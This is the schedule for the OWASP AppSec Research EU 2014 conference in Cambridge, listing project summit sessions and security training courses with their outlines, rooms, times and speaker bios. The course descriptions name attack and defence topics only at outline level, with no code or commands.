AppSec Europe 2014: Full Schedule

Welcome to the full schedule of the OWASP AppSec Research EU 2014 conference days

08:00 BST

Registration & Breakfast

Monday June 23, 2014 08:00 - 09:00 BST
LAB001 Broad Street Entrance, Loed Ashcroft International Business Schoo

09:00 BST

Room LAB215: Summit Session - OWASP Education Projects

This will be the OWASP Education Project's community gathering of academics in order to discuss what OWASP can do for the academic community.

Working Session Specifics:

Re-thinking the concept of OWASP University Supporter
Expand the concept of the OWASP Student Chapters.
Establish and expand the OWASP University Challenge.
Suggested application security curriculum.
Discuss and establish the concept of OWASP Academic Advocate.
Promote participation of OWASP projects into the Google Summer of Code program

Please check attached PDF file for location

Speakers

Konstantinos Papapanagiotou, Spryros Gastreratos

Information Security Services Team Lead, OTE

Both trainers are Hackademic project leaders, long time OWASP members and application security professionals

LAB 2nd 2 pdf

Monday June 23, 2014 09:00 - 13:00 BST
LAB215

Project Summit

09:00 BST

ROOM LAB216: Summit Session - OWASP 24/7 Podcast Series

In the past 6 months, the OWASP 24/7 Podcast Series has been listened to over 30,000 times. In this session, Mark Miller, Executive Producer of the series, will talk about how the series was started, the equipment used to create the podcasts and the process of publication on SoundCloud for distribution to the iTunes channel. The session will include a live interview that will be recorded and published in real time.

Please check attache Pdf fils for location

Speakers

Mark Miller

Senior Storyteller and DevSecOps Advocate, Sonatype

Mark is the co-founder of the "All Day DevOps" live online conference.As part of his community engagement initiatives, he is the Editor-in-Chief of the LinkedIn DevOps Group(65K+ members), Executive Producer of the DevSecOps Days Podcast Series (260,000+ listens), and Producer of... Read More →

LAB 2nd 2 pdf

Monday June 23, 2014 09:00 - 13:00 BST
LAB216

Project Summit

09:00 BST

Room LAB220: Summit Session - OWASP Python Security Project

Python Security is a free, open source, OWASP project that aims at creating a hardened version of python that makes it easier for security professionals and developers to write applications more resilient to attacks and manipulations.

Working Session Objectives:

1. Presentation of the project.

2. Project overview, goals and objectives.

3. Review of challenges faced by the team, case studies.

4. Brainstorming session on what should be the focus of our efforts.

5. Identify what needs to be secured.

Speakers

Enrico Branca

Independent Consultant

Enrico Branca is an experienced researcher with specialist knowledge in Cyber security. He has been working in information security for over a decade with experience in software security, information security management, and cyber security R&D. He has been trained and worked in various... Read More →

Monday June 23, 2014 09:00 - 13:00 BST
LAB220

Project Summit

09:00 BST

Training room 1 - WebHacking: Breaking, Building and Defence

Writing Secure code is the most effective method to securing your web applications. Writing secure code takes skill and know-how but results in a more stable and robust application and assists in protecting an organisations brand.

The class is a combination of lecture, security testing demonstration and code review. Students will learn the most common threats against applications. More importantly, students will learn how to code secure web solutions via defense-based code samples.

As part of this course, we will explore the use of third-party security libraries and frameworks to speed and standardize secure development. We will highlight production quality API’s from various languages and frameworks that provide production quality and scalable security controls.

This course will include secure coding information for Java, PHP and .NET programmers, but any software developer building web applications or webservices will benefit.

This intensive 1-day course focuses on the most common web application security problems, including aspects of both the OWASP Top Ten (2013) and the MITRE Top 25. Several other OWASP secure coding projects will be featured. The course will introduce and demonstrate application assessment techniques, illustrating how application vulnerabilities can be exploited so students really understand how to avoid introducing such vulnerabilities in their code.

Speakers

Eoin Keary

CTO and Founder, BCC Risk Advisory Ltd.

Eoin Keary is an international board member of OWASP. He leads the OWASP code review project. Eoin is the CTO and founder of BCC Risk Advisory Ltd. He has also led global security engagements for some of the world’s largest financial services and consumer products companies. Eoin... Read More →

Jim Manico

Founder and Lead Instructor, Manicode Security

Jim Manico is the founder of Manicode Security where he trains software developers on secure coding and security engineering. He is also an investor/advisor for 10Security, Aiya, MergeBase, Nucleus Security, KSOC and Inspectiv. Jim is a frequent speaker on secure software practices... Read More →

Monday June 23, 2014 09:00 - 13:00 BST
LAB111

Training

09:00 BST

Training room 2 - The Mobile App Security Boot Camp

The Mobile App Security Boot Camp is a 2-day training course covering both Android and iOS App security. As a new course for 2014, we provide the most comprehensive and cutting edge guide to mobile App security that is currently available, including in depth coverage of iOS 7! The course is provided as a partnership between MDSec and MWR InfoSecurity, pioneers in mobile security.

Pre-requisite of Training Class:

1) Student.

A basic knowledge of programming and mobile security concepts.

2) Hardware.

All delegates will be provided with a suitable iOS device to perform the labs, it is not necessary to bring your own.

Administrative access to the laptop and the ability to install a few tools, and disable personal firewalls or virus scanners should they get in the way of the lab exercises.

We strongly recommend a personal laptop – if your corporate laptop build is too restrictive this may affect your ability to participate in the course fully.

A laptop with the capability to connect to wireless and wired networks. 3) Software.
Students require a player to run VMWare images.
Daily Class Outline:

Day 1: iOS App Hacking

The course syllabus provides an overview of iOS security features, jailbreaking and approaches to App security assessment. After an introduction to the subject, we delve in to common insecurities, including but not limited too:

Insecure file storage

Keychain attacks

Insecure transport security

Run-time attacks

Cycript

Injection attacks

IPC handlers

Man-in-the-middle attacks

Defeating jailbreak and other defensive detection and prevention routines

Attendees will gain theoretical and practical experience of:

How to quickly and efficiently pinpoint and exploit vulnerabilities in iOS Apps

How to hack UIWebviews, IPC handlers, client-side SQL databases, the

keychain and the App runtime

Real-world, 2014 techniques used to defeat real Apps on iOS7!

Knowledge of defensive and remedial advice

Day 2: Android App Hacking

Day two of the course will provide an introduction to the attack surface exposed by Android devices and their applications. The Android attack surface will be analysed to demonstrate how its weaknesses can be exploited from various vectors, such as from installed malicious software (malware), local attackers in a Man-in-The-Middle (MiTM) scenario and from attackers with local physical access (e.g. stolen device). Attendees will actively analyse applications, identify vulnerabilities within them and write their own exploits to compromise the application and/or device.

Attendees will gain hands on experience assessing and exploiting Android device and application vulnerabilities. The course will also teach how to defend against the latest Android platform and application threats. The experienced consultants delivering the course will guide attendees through an assessment of a range of applications; all of which are based on real world examples, following a structured methodology.

Course outline

Theory

Introduction to the Android security model

Black box assessment approach

Reverse engineering applications

Introduction to Android malware

Android Man-in-the-Middle

Stolen device reviews

Analysis/Assessment/Attack and Defence

IPC end points

JavaScript Bridges

Mobile Substrate

File permission attacks

Tap jacking

Android Sandbox

Speakers

Dominic Chell

Director, MDSec

Dominic (@domchell) is a director at MDSec where he works within the ActiveBreach team and is responsible for conducting intelligence-led attack simulations under the CBEST, STAR and TIBER frameworks. Dominic is a published author and active researcher, frequently releasing tools... Read More →

Robert Miller

MWR InfoSecurity

Robert has worked for MWR Infosecurity since 2011, with a strong focus on Android device and application security. He co-runs MWR's Android Secure Development training course, and works with major application developers and device manufacturers in producing security critical products... Read More →

Monday June 23, 2014 09:00 - 13:00 BST
LAB112

Training

09:00 BST

Training room 3 - CISO training: Managing Web & Application Security - OWASP for senior managers

Setting up, managing and improving your global information security organisation using mature OWASP projects and tools. Achieving cost-effective application security and bringing it all together on the management level. How to use and leverage OWASP and other common best practices to improve your security programs and organization. The workshop will also discuss a number of quick wins and how to effectively manage global security initiatives and use OWASP tools inside your organisation. The author has extensive experience of managing his own secure development organization as well as advising to improve a number of global secure development organisations and processes.

Topics:

OWASP Top-10 and OWASP projects - how to use within your organisation

Risk management and threat modelling methods (OWASP risk analysis, ISO-27005,...)

Benchmarking & Maturity Models

Security Strategy

Organisational Design and managing change for global information security programs

SDLC

Training: OWASP Secure Coding Practices - Quick Reference Guide, Development Guide, Training tools for developers

Measuring & Verification: ASVS (Application Security Verification Standard) Project, Code Review Guide, Testing Guide

Development & Operation: Libraries and Frameworks (ESAPI (Enterprise Security API), AppSensor, ...), Threat assessments using OWASP Cornucopia

All discussion and issues raised by participants at the workshop will be under the confidentiality under the Chatham House Rule (http://en.wikipedia.org/wiki/Chatham_House_Rule).

Attendee takeaways and key learning objectives

how to effectively build and run a global information security function

strengthening web and application security using OWASP projects

improving web & application security for organisations from green-field level to very sophisticated security organisations

Speakers

Tobias Gondrom

Global Board Member, OWASP

Tobias Gondrom is a global board member of OWASP (Open Web Application Security Project) and former chairman until December 2015. And until April 2015, he was leading a boutique Global CISO and Information Security & Risk Management Advisory based in Hong Kong, United Kingdom and... Read More →

Monday June 23, 2014 09:00 - 13:00 BST
LAB113

Training

09:00 BST

Training room 4 - MDSec's Web Application Hacker's Handbook, Live Edition

The course follows the chapters of the Second Edition of The Web Application Hacker's Handbook, with strong focus on practical attacks (there are only 136 slides in either of the 2 or 3 day courses). After a short introduction to the subject we delve into common insecurities in logical order:

Introduction to Web Application Security Assessment (Chapters 1-3)

Automating Bespoke Attacks: Practical hands-on experience with Burp

Suite (Chapter 13)

Application mapping and bypassing client-side controls (Chapters 4-5)

Failures in Core Defense Mechanisms: Authentication, Session

Management, Access Control, Input Validation (Chapters 6-8)

Injection and API flaws: (Chapters 9-10)

User-to-User Attacks (Chapters 12-13)

Attendees will gain theoretical and practical experience of:

How to quickly and efficiently pinpoint and exploit vulnerabilities in web applications

How to hack using LDAP, XPath, SOAP, HTTP Parameter Pollution (HPP), and HPI

Real-world, 2012 techniques in SQL Injection against Oracle, MySQL and MSSQL

The real risk: how to turn XSS/CSRF vulnerabilities into full account compromise

Harnessing new technologies such as HTML5, NoSQL, and Ajax

New attack types and techniques: Bit Flipping, Padding Oracle, Automated

Access Control checking

How to immediately recognise and exploit Logic Flaws

For more detailed information about the course's practical structure, see the Web Application Hacker's Methodology chapter from the original version of the book.

To see the practical exercises, in action, please visit:

http://www.mdsec.net/labs/demo.html

Speakers

Marcus Pinto

Marcus Pinto is a Director of MDSec and co-author of the Web Application Hacker’s Handbook, with over 13 years’ experience in technical security assessment and 8 years’ experience in delivering technical security training for global audiences such as Blackhat, Hack in the Box... Read More →

Monday June 23, 2014 09:00 - 13:00 BST
LAB027

Training

09:00 BST

Training room 5 - The Art of Exploiting Injection Flaws

OWASP rates injection flaws as the most critical vulnerability within the Top 10 most Critical Web Application Security Risks under the OWASP Top 10 project: https://www.owasp.org/index.php/Top_10_2013-A1-Injection

This hands-on session will only focus on the injection flaws and the attendees will get an in-depth understanding of the flaws arising from this vulnerability. The topics covered in the class are:

SQL Injection
XPATH Injection
LDAP Injection
Hibernate Query Language Injection
Direct OS Code Injection
XML Entity Injection

During the two-days course, the attendees will have access to a number of challenges for each flaw and they will learn a variety of exploitation techniques used by the attackers in the wild. Identify, extract, escalate, execute; we have got it all covered. The following are the objectives of the course:

Understand the problem of Injection Flaws

Learn a variety of advanced exploitation techniques which hackers use

learn how to fix these problems

Speakers

Sumit Siddharth

Founder, NotSoSecure

Sumit Siddharth (Sid) is the founder of NotSoSecure (www.notsosecure.com), a specialist IT security firm delivering high-end IT security consultancy and Training. Prior to NotSoSecure, he worked as Head of Penetration Testing for a leading IT security company in the UK. He has more than 9 years of experience in Penetration Testing. Sid has authored a... Read More →

Monday June 23, 2014 09:00 - 13:00 BST
LAB006

Training

09:00 BST

Training room 6 - Defensive Programming – JavaScript & HTML5

Understand JavaScript and HTML5 Features to Secure Your Client-side Code

HTML5 is the fifth revision of the HTML standard. HTML5, and its integration with JavaScript, introduces new security risks that we need to carefully consider when writing web front-end code. Modern web-based software, including mobile web front-end applications, makes heavy use of innovative JavaScript and HTML5 browser support to deliver advanced user experiences. Front-end developers focus their efforts on creating this experience and are generally not aware of the security implications of the technologies they use.

The Defensive Programming – JavaScript/HTML5 course helps web front-end developers understand the risks involved with manipulating the HTML Document Object Model (DOM) and using the advanced features of JavaScript and HTML 5 such as cross-domain requests and local storage. The course reinforces some important security aspects of modern browser architecture and presents the student with defensive programming techniques that can be immediately applied to prevent common vulnerabilities to be introduced. Additionally, the course provides a detailed description of typical JavaScript sources and sinks and explains how they can be used to detect problems in code.

This course is structured into modules that cover the areas of concentration for defensive programming in JavaScript and HTML5 and includes code analysis and remediation exercises. The high-level topics for this course are:

•The HTML5 and JavaScript Risk Landscape
•Storage of Sensitive Data
•Secure Cross-domain Communications
•Implementing Secure Dataflow
•JSON-related Techniques

This course includes 2 labs with hands on exercises where students will learn to apply the defensive programming techniques learned in the course. Students are encouraged to bring laptops with VirtualBox installed to run the VM with the labs.

Objectives

After successfully completing this course, you will:

•Apply HTML5 Defensive Programming Techniques.
•Apply JavaScript Defensive Programming Techniques.
•Apply JSON Defensive Programming Techniques.
•Consider Common Assessment Approaches.

Speakers

Tiago Teles

Consultant

Tiago Teles is a Technical Consultant with 7 years of experience in clients across different sectors and countries, including banking, insurance, telecommunications and commercial organizations in a variety of roles: Delivering Training, Development, Business Intelligence and Quality... Read More →

Monday June 23, 2014 09:00 - 13:00 BST
LAB028

Training

09:00 BST

Training room 7 - TLS/SSL in Practice

SSL/TLS as used today has more and more problems and it's difficult to understand, what are the root causes of these problems, and how to detect and finally avoid or fix them.

This training will give a brief introduction to SSL, how it works i. g., what problems are known according the protocol, the PKI used, and the known vulnerabilities including potential attacks and provide tools to check for these issues. The main focus will be on SSL used in HTTPS. Other usages i.e. SSL for SMTP are a small subset. As a round-up there will be recommendations how to configure SSL securely.

Topics

The course will be a hands-on-training showing by example how to check the established SSL connection (including ciphers) to a web server and show how to analyse the provided certificate. A great amount of tools will be explained and it will be demonstrated how these tools can be used to detect weaknesses in the SSL connection and such.

The explained tools are for example: openssl, sslaudit, sslscan, ssltest.pl, o-saft, and some more, as well as some online checking tools like ssllabs.com. We show what are these tools useful for, what they can do and what they cannot.

Finally we show how the OWASP tool o-saft can be used to cover most of the previous shown techniques and how to use its advanced features like:

checking for special SSL settings

check multiple servers at a time

customizing the results

using private SSL-libraries

customizing o-saft itself

or simple debugging of various SSL connection problems.

The purpose of this course is to provide a tool set for checking SSL to the participants and teach the participants how and when to use which tool.

The course is intended to teach builders and defenders how to analyse SSL from a client-site view, in particular what an auditor or penetration tester does. It will not go into the details of fuzzing or even breaking SSL such as sslsniff, ssltrap and a like or exploiting vulnerabilities. Instead it should give developers an idea how to use SSL securely and give system architects, administrator or operational people hints how to set-up and configure SSL in a proper secure way.

Technical Requirements

The participants should bring their own laptop with any operating system (recommended is Linux) and at least following tools installed:

openssl (1.0.1e or newer)

perl (5.8 or newer), on windows system Strawberry perl is recommended

Net::SSLeay (1.53 or newer), IO::Socket::SSL (1.37 or newer)

python (2.7) optional

Optional, for smooth testing, a local SSL-enabled web server should be running on the laptop.

Others

All other used tools are open source and available during the course. The participants are reliable on their own for accepting and following the license rules of each tool.

Speakers

Achim Hoffmann

Starting with Linux/network security in the nineties. Achim Hoffmann has been working in web application security since more than 12 years. While working as a developer for web-application for several years he started concentrating on web application security as major subject in... Read More →

Monday June 23, 2014 09:00 - 13:00 BST
LAB109

Training

13:00 BST

Lunch - Monday 23rd June

Monday June 23, 2014 13:00 - 14:00 BST
LAB005 and LAB006

Lunch, LunchTrain, LunchSummit

14:00 BST

Room LAB215: Summit Session - OWASP Code Review Guide

A gathering of software developers sharing good and bad coding examples, with the aim of educating everyone reading the code review guide on what to do and what not do do when coding web sites.

Working Session Proposed Outcomes:

Collect a number of bad coding examples to show readers code they should avoid writing.
Collect a number of good coding examples to show readers how security code should be written.
Collect the above for Java, PHP and C# languages, plus possibly C/C++, Ruby, Python, Perl, etc..
Raise awareness of the ongoing Code Review Guide and encourage OWASP members to participate in the project.

Please check attached PDF file for location

Moderators

Johanna Curiel

Security Engineer and Researcher, Mobiquity

Johanna Curiel is a security engineer and researcher with 18 years experience in programming, testing and quality control. Her early encounters with hackers and cybercrime was a turning point in her career to work in the area of Cyber security.Between 2005 and 2007, she worked as... Read More →

Speakers

Gary D. Robinson

LAB 2nd 2 pdf

Monday June 23, 2014 14:00 - 18:00 BST
LAB309

Project Summit

14:00 BST

Training room 1 - WebHacking: Breaking, Building and Defence

Speakers

Eoin Keary

CTO and Founder, BCC Risk Advisory Ltd.

Jim Manico

Founder and Lead Instructor, Manicode Security

Monday June 23, 2014 14:00 - 18:00 BST
LAB111

Training

14:00 BST

Training room 2 - The Mobile App Security Boot Camp

Insecure file storage

Keychain attacks

Insecure transport security

Run-time attacks

Cycript

Injection attacks

IPC handlers

Man-in-the-middle attacks

Defeating jailbreak and other defensive detection and prevention routines

Attendees will gain theoretical and practical experience of:

How to quickly and efficiently pinpoint and exploit vulnerabilities in iOS Apps

How to hack UIWebviews, IPC handlers, client-side SQL databases, the

keychain and the App runtime

Real-world, 2014 techniques used to defeat real Apps on iOS7!

Knowledge of defensive and remedial advice

Course outline

Theory

Introduction to the Android security model

Black box assessment approach

Reverse engineering applications

Introduction to Android malware

Android Man-in-the-Middle

Stolen device reviews

Analysis/Assessment/Attack and Defence

IPC end points

JavaScript Bridges

Mobile Substrate

File permission attacks

Tap jacking

Android Sandbox

Speakers

Dominic Chell

Director, MDSec

Robert Miller

MWR InfoSecurity

Monday June 23, 2014 14:00 - 18:00 BST
LAB112

Training

14:00 BST

Training room 3 - CISO training: Managing Web & Application Security - OWASP for senior managers

OWASP Top-10 and OWASP projects - how to use within your organisation

Risk management and threat modelling methods (OWASP risk analysis, ISO-27005,...)

Benchmarking & Maturity Models

Security Strategy

Organisational Design and managing change for global information security programs

SDLC

Training: OWASP Secure Coding Practices - Quick Reference Guide, Development Guide, Training tools for developers

Measuring & Verification: ASVS (Application Security Verification Standard) Project, Code Review Guide, Testing Guide

Development & Operation: Libraries and Frameworks (ESAPI (Enterprise Security API), AppSensor, ...), Threat assessments using OWASP Cornucopia

how to effectively build and run a global information security function

strengthening web and application security using OWASP projects

improving web & application security for organisations from green-field level to very sophisticated security organisations

Speakers

Tobias Gondrom

Global Board Member, OWASP

Monday June 23, 2014 14:00 - 18:00 BST
LAB113

Training

14:00 BST

Training room 4 - MDSec's Web Application Hacker's Handbook, Live Edition

Introduction to Web Application Security Assessment (Chapters 1-3)

Automating Bespoke Attacks: Practical hands-on experience with Burp

Suite (Chapter 13)

Application mapping and bypassing client-side controls (Chapters 4-5)

Failures in Core Defense Mechanisms: Authentication, Session

Management, Access Control, Input Validation (Chapters 6-8)

Injection and API flaws: (Chapters 9-10)

User-to-User Attacks (Chapters 12-13)

Attendees will gain theoretical and practical experience of:

How to quickly and efficiently pinpoint and exploit vulnerabilities in web applications

How to hack using LDAP, XPath, SOAP, HTTP Parameter Pollution (HPP), and HPI

Real-world, 2012 techniques in SQL Injection against Oracle, MySQL and MSSQL

The real risk: how to turn XSS/CSRF vulnerabilities into full account compromise

Harnessing new technologies such as HTML5, NoSQL, and Ajax

New attack types and techniques: Bit Flipping, Padding Oracle, Automated

Access Control checking

How to immediately recognise and exploit Logic Flaws

Speakers

Marcus Pinto

Monday June 23, 2014 14:00 - 18:00 BST
LAB027

Training

14:00 BST

Training room 5 - The Art of Exploiting Injection Flaws

Understand the problem of Injection Flaws

Learn a variety of advanced exploitation techniques which hackers use

learn how to fix these problems

Speakers

Sumit Siddharth

Founder, NotSoSecure

Monday June 23, 2014 14:00 - 18:00 BST
LAB006

Training

14:00 BST

Training room 6 - Defensive Programming – JavaScript & HTML5

Speakers

Tiago Teles

Consultant

Monday June 23, 2014 14:00 - 18:00 BST
LAB028

Training

14:00 BST

Training room 7 - TLS/SSL in Practice

checking for special SSL settings

check multiple servers at a time

customizing the results

using private SSL-libraries

customizing o-saft itself

or simple debugging of various SSL connection problems.

openssl (1.0.1e or newer)

perl (5.8 or newer), on windows system Strawberry perl is recommended

Net::SSLeay (1.53 or newer), IO::Socket::SSL (1.37 or newer)

Speakers

Achim Hoffmann

Monday June 23, 2014 14:00 - 18:00 BST
LAB109

Training

16:00 BST

Room LAB220: OWASP OpenSAMM

During the AppSec conferences, the SAMM project team organises workshops for you to influence the direction SAMM evolves. This is an excellent opportunity to exchange experiences with your peers.

Understanding of SAMM is a prerequisite for participation in this OWASP summit session.

Please check PDF file for location

Speakers

Sebastien Deleersnyder

CEO, Toreon

Sebastien (Seba) Deleersnyder is co-founder and CTO of Toreon. He started the Belgian OWASP chapter and was an OWASP Foundation Board member. With a development background and years of security experience, he has trained countless developers to create more secure software. Co-leading... Read More →

LAB 2nd 2 pdf

Monday June 23, 2014 16:00 - 18:00 BST
LAB220

Project Summit

08:00 BST

Registration & Breakfast

Tuesday June 24, 2014 08:00 - 09:00 BST
LAB001 Broad Street Entrance, Loed Ashcroft International Business Schoo

Registration

09:00 BST

Room LAB215: Summit Session - OWASP Development Guide

In this session, we will briefly take a short tour through the long and inter-twined history of OWASP and the Developer Guide, OWASP's first project. The Developer Guide has had various attempts to restart it over the years, and very nearly all of them failed. Let's have an interactive session on how to get the Developer Guide back on its feet, build community, and re-build a working project team.

Please check attached PDF file for location(MAP FLOOR)

Speakers

Andrew van der Stock

Executive Director, OWASP Foundation

Andrew van der Stock is a long-time security researcher and is the current co-lead of the OWASP Top 10 and OWASP Application Security Verification Standard, and is formerly an OWASP Global Board member. Andrew has trained or spoken at many conferences worldwide, including Black Hat... Read More →

LAB 2nd 2 pdf

Tuesday June 24, 2014 09:00 - 12:00 BST
LAB215

Project Summit

09:00 BST

Room LAB216: Summit Session - OWASP 24/7 Podcast Series

Moderators

Martin Law

Director, First Defence Information Security

With over 25 years in the security industry Martin and involved in many initiatives, he's a well known and popular individual that helps to evolve the industry and its community.OWASP Leeds Chapter Leader, former CREST board member, ISF council member and UK Chapter Leader, White... Read More →

Speakers

Mark Miller

Senior Storyteller and DevSecOps Advocate, Sonatype

LAB 2nd 2 pdf

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB216

Project Summit

09:00 BST

Room LAB220 :Summit Session - OWASP Media Project

To brief project leaders on video sharing and live streaming to they can promote their project.

Present the official OWASP YouTube channel
Involve project leaders to promote their content

Please join us at this year's working session so you can pitch in and help with the work we are doing during the conference.

Please check attached PDF file for location (MAP FLOOR)

Speakers

Jonathan Marcil

Sr. AppSec Engineer, Twitch

Jonathan has created over a hundred threat models during his career and enjoys sharing his experience. He currently co-leads the OWASP Threat Model Cookbook Project and is a board member of the OWASP Orange County chapter located in beautiful Irvine, California. Originally from Montreal... Read More →

LAB 2nd 2 pdf

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB220

Project Summit

09:00 BST

Training room 1 - Java Web Hacking & Hardening

This one day hands-on workshop focuses on securing Java web applications against malicious hacker attacks. During the workshop a Java web application (written specifically for this workshop) with lots of vulnerabilities is examined, exploited, and secured. We will start with common vulnerabilities found in web applications: Authentication bypasses, different flavours of XSS (reflected, stored, DOM-based), (blind) SQL-Injection, CSRF, Clickjacking, Command Injection, Path Traversals, SSRF, Session Attacks like Session Fixation, etc. and continue to more specialized security holes (covering XML like XXE Attacks and XPath Injections as well as REST-ful interfaces, JSON and WebSockets). Also prophylactic protection techniques are discussed like introducing protection tokens (e.g. OWASP’s CSRFGuard) as well as adding several security headers (CSP and more) and considering encryption techniques.

Speakers

Christian Schneider

Freelancer, Christian Schneider

Christian has pursued a successful career as a freelance Java software developer since 1997 and expanded it in 2005 to include the focus on IT security. His major areas of work are penetration testing, security architecture consulting, and threat modeling. As a trainer, Christian... Read More →

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB111

Training

09:00 BST

Training room 2 - The Mobile App Security Boot Camp

Insecure file storage

Keychain attacks

Insecure transport security

Run-time attacks

Cycript

Injection attacks

IPC handlers

Man-in-the-middle attacks

Defeating jailbreak and other defensive detection and prevention routines

Attendees will gain theoretical and practical experience of:

How to quickly and efficiently pinpoint and exploit vulnerabilities in iOS Apps

How to hack UIWebviews, IPC handlers, client-side SQL databases, the

keychain and the App runtime

Real-world, 2014 techniques used to defeat real Apps on iOS7!

Knowledge of defensive and remedial advice

Theory

Introduction to the Android security model

Black box assessment approach

Reverse engineering applications

Introduction to Android malware

Android Man-in-the-Middle

Stolen device reviews

Analysis/Assessment/Attack and Defence

IPC end points

JavaScript Bridges

Mobile Substrate

File permission attacks

Tap jacking

Android Sandbox

Speakers

Dominic Chell

Director, MDSec

Robert Miller

MWR InfoSecurity

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB112

Training

09:00 BST

Training room 3 - Bootstrap and improve your SDLC with OpenSAMM

Building security into the software development and management practices of a company can be a daunting task. There are many elements to the equation: company structure, different stakeholders, technology stacks, tools and processes, and so forth. Implementing software assurance can have a significant impact on the organization. Yet, trying to achieve this without a good framework is most likely leading to just marginal and unsustainable improvements. OWASP OpenSAMM gives you a structural and measurable framework to do just that. It enables you to formulate and implement a strategy for software security that is tailored to the risk profile of your organization.

The goal of this one-day training, which is conceived as a mix of training and workshop, is for the participants to get a more in-depth view on and practical feeling of the OpenSAMM model. The training is setup in three different parts.

In a first part, an overview is presented of the OpenSAMM model and similarities and differences with other similar models are explained. The different domains (governance, construction, verification, deployment), their activities and relations are explained. Furthermore, different constituent elements (e.g., metrics) are discussed and the overall usage scenarios of the model are explained.

Next, approx. half a day will be spent on doing an actual OpenSAMM evaluation of your own organization (or one that you have worked for). We will go through an evaluation of all the OpenSAMM domains and discuss the results in group. This will give all participants a good indication of the organization’s maturity wrt. software assurance. In the same effort, we will define a target model for your organization and identify the most important challenges in getting there.

The final part of the training will be dedicated to specific questions or challenges that you are facing wrt. secure development in your organization. In this group discussion, experience between the different participants will be shared to address these questions.

In case you haven't started a secure software initiative in your organization yet, this training should provide you with the necessary foundations and ideas to do so. Be prepared for a highly effective and applicable treatment of this large domain ! And in case you would be concerned about confidentiality issues, we adhere to the Chatham House Rule.

After the conference the OpenSAMM project team comes together for their first OpenSAMM summit in Cambridge. If you want to contribute to this flagship project, stay and join us at the summit. More details on www.opensamm.org.

Requirements

This training requires a good amount of interactivity and common-sense. No specific technical requirements are set forth.

Speakers

Sebastien Deleersnyder

CEO, Toreon

Bart De Win

Bart De Win has over 20 years of experience in software security. He has an extensive background in the field, including his Ph.D. and research work on methods and techniques for software protection. Since 2009, Bart has been responsible for all application security services within... Read More →

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB113

Training

09:00 BST

Training room 4 - MDSec's Web Application Hacker's Handbook, Live Edition

Introduction to Web Application Security Assessment (Chapters 1-3)

Automating Bespoke Attacks: Practical hands-on experience with Burp

Suite (Chapter 13)

Application mapping and bypassing client-side controls (Chapters 4-5)

Failures in Core Defense Mechanisms: Authentication, Session

Management, Access Control, Input Validation (Chapters 6-8)

Injection and API flaws: (Chapters 9-10)

User-to-User Attacks (Chapters 12-13)

Attendees will gain theoretical and practical experience of:

How to quickly and efficiently pinpoint and exploit vulnerabilities in web applications

How to hack using LDAP, XPath, SOAP, HTTP Parameter Pollution (HPP), and HPI

Real-world, 2012 techniques in SQL Injection against Oracle, MySQL and MSSQL

The real risk: how to turn XSS/CSRF vulnerabilities into full account compromise

Harnessing new technologies such as HTML5, NoSQL, and Ajax

New attack types and techniques: Bit Flipping, Padding Oracle, Automated

Access Control checking

How to immediately recognise and exploit Logic Flaws

Speakers

Marcus Pinto

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB027

Training

09:00 BST

Training room 5 - The Art of Exploiting Injection Flaws

Understand the problem of Injection Flaws

Learn a variety of advanced exploitation techniques which hackers use

learn how to fix these problems

Speakers

Sumit Siddharth

Founder, NotSoSecure

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB006

Training

09:00 BST

Training room 6 - Security of XML-based Web Services and Single Sign-On

Web Services and Single Sign-On belong to the group of the most important Internet technologies. They are used in many fields such as automotive, healthcare, e-government, or military infrastructures. In recent years, it has been shown that these technologies allow for serious attacks. The attacks take advantage of the XML complexity and make it possible to read data from secured servers, authenticate as an arbitrary user in Single Sign-On scenarios, or decrypt confidential data.

In this training, we will give an overview of the most important XML-specific attacks. Participants will get the opportunity to carry out these attacks in a prepared virtual machine. The attacks will be first tested manually (e.g., with soapUI), in order to get a feeling for the attacks. Subsequently, we will present our penetration testing tool WS-Attacker, which will be used to execute the presented attacks automatically. For each of the attacks, countermeasures will be discussed.

Contents

The course will contain the following topics. In each topic, the attendants will get the opportunity to execute practical evaluations using soapUI, WS-Attacker, or a different applications:

• XML and SOAP-based Web Services

XML Schema and WS-Policy

WS-Addressing und WS-Addressing Spoofing

XML Parsing (DOM vs SAX)

XML-specific Denial-of-Service Attacks

XML Security and WS-Security

◦ Why not SSL/TLS?

XML Signature

◦ ID-based and XPath-based XML Signatures

◦ XMLSignatureWrappingAttacks

XML Encryption

◦ Attacks on symmetric encryption

◦ Attacks on asymmetric encryption

WS-Attacker

SAML-based Single-Sign On

◦ Attacks

Requirements

A laptop with a recent version of “Virtual Box“ (the virtual machine will be provided). VMWare and other virtualization software should also work but cannot be supported.

Speakers

Christian Mainka

Security Consultant, Horst Görtz Institute for IT Security, Chair for Network and Data Security, Ruhr-University Bochum

Christian Mainka is a Security Researcher at the Ruhr University Bochum, Chair for Network and Data Security. Since 2009, he focuses on XML and Web Services technologies and develops his penetration testing tool WS-Attacker and has published several papers in the field of XML security... Read More →

Juraj Somorovsky

Security Consultant, Ruhr-University Bochum

Juraj Somorovsky finished his PhD in the area of XML Security in 2013. In his thesis „On the Insecurity of XML Security“ he analyzes various attacks on Web Services and presents practical countermeasures against these attacks, which were applied in XML Security specifications... Read More →

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB028

Training

09:00 BST

Training room 7 - Defensive Programming in PHP

This course explores measures that developers can take both from a coding and configuration perspective to secure their PHP applications.

PHP is a powerful and versatile web development platform that is widely used throughout the industry. PHP applications are generally affected by most of the same risks that affect web applications written in other languages. Although it has a lot in common with other web platforms, there are specific aspects of PHP that set it apart from the other technologies. This is also true from a risk perspective. Some PHP risks are unique or amplified by the platform.

This course highlights the features and specifics of the platform that can potentially introduce risks including (but not limited to) unsafe PHP configuration, null-byte issues, dangerous APIs, cryptography, and dynamic file inclusion issues. Once PHP features and risks are understood by the student, this course builds upon this knowledge and teaches a set of defensive programming techniques that can be followed to create secure PHP applications including in the areas of file system access, session management, authentication, input validation/output encoding, cross-site request forgery, transport security, and injection attacks.

This course is structured into modules that cover the areas of concentration for defensive programming for the PHP platform and includes code analysis and remediation exercises. The high-level topics for this course are:

PHP Platform Security

The PHP Application Risk Landscape

Secure Design Principles

Defensive Programming Techniques in PHP

Secure PHP Architecture and Configuration

Objectives

After successfully completing this course, students will:

Comprehend the PHP Platform

Appreciate the Risks Affecting PHP Applications

